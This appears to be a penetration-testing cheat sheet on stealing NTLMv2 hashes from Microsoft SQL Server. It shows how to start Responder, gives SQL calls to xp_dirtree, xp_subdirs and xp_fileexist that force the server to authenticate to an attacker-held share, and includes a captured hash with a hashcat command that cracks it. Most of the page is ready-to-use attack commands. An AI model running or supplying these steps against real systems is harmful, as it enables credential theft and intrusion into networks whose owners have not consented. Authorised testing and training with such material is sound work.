🚎 Exfiltration

㊙️ Exfiltrating NTLMv2 Hashes

NTLMv2 hashes can be exfiltrated using several stored procedures that interact with the file system.

Start Responder

bash

responder -I tun0

Using xp_dirtree

sql

exec xp_dirtree '\\192.168.10.10\hash';

Using xp_subdirs

sql

exec xp_subdirs '\\192.168.10.10\hash';

Using xp_fileexist

sql

exec xp_fileexist '\\192.168.10.10\hash';

⚽ Crack the Hash

The hashcat tool can be used with mode 5600 (NetNTLMv2) to perform a bruteforce attack on the hash.

bash

qu35t::RED:1122334455667788:A104167D1505D0D6022B3272F25AD94A:010100000000000080AE45792FD8DA01FBBCD3B6144F55030000000002000800470058004500550001001E00570049004E002D0044004600320041003A0052004E00440047004F00500004003400570049004E002D0044004600320041004A0052004E00440048004F0050002E0047005800450055002E004C004F00430041004C000300140047005800450055002E004C004F00430040004C000500140047005800450055002E004C004F00430041004C000700080080AE45793FD8DA0106000400020000000800300030000000000000000000000000200000E602DFE4E1C02C5B7F623200A652C67B1E23B5B6FB60319534B40E5F1FFFBADD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350033000000000000000000

bash

hashcat -m 5600 hash /opt/rockyou.txt

🚎 Exfiltration ​

㊙️ Exfiltrating NTLMv2 Hashes ​

Start Responder ​

Using xp_dirtree ​

Using xp_subdirs ​

Using xp_fileexist ​

⚽ Crack the Hash ​

🚎 Exfiltration

㊙️ Exfiltrating NTLMv2 Hashes

Start Responder

Using xp_dirtree

Using xp_subdirs

Using xp_fileexist

⚽ Crack the Hash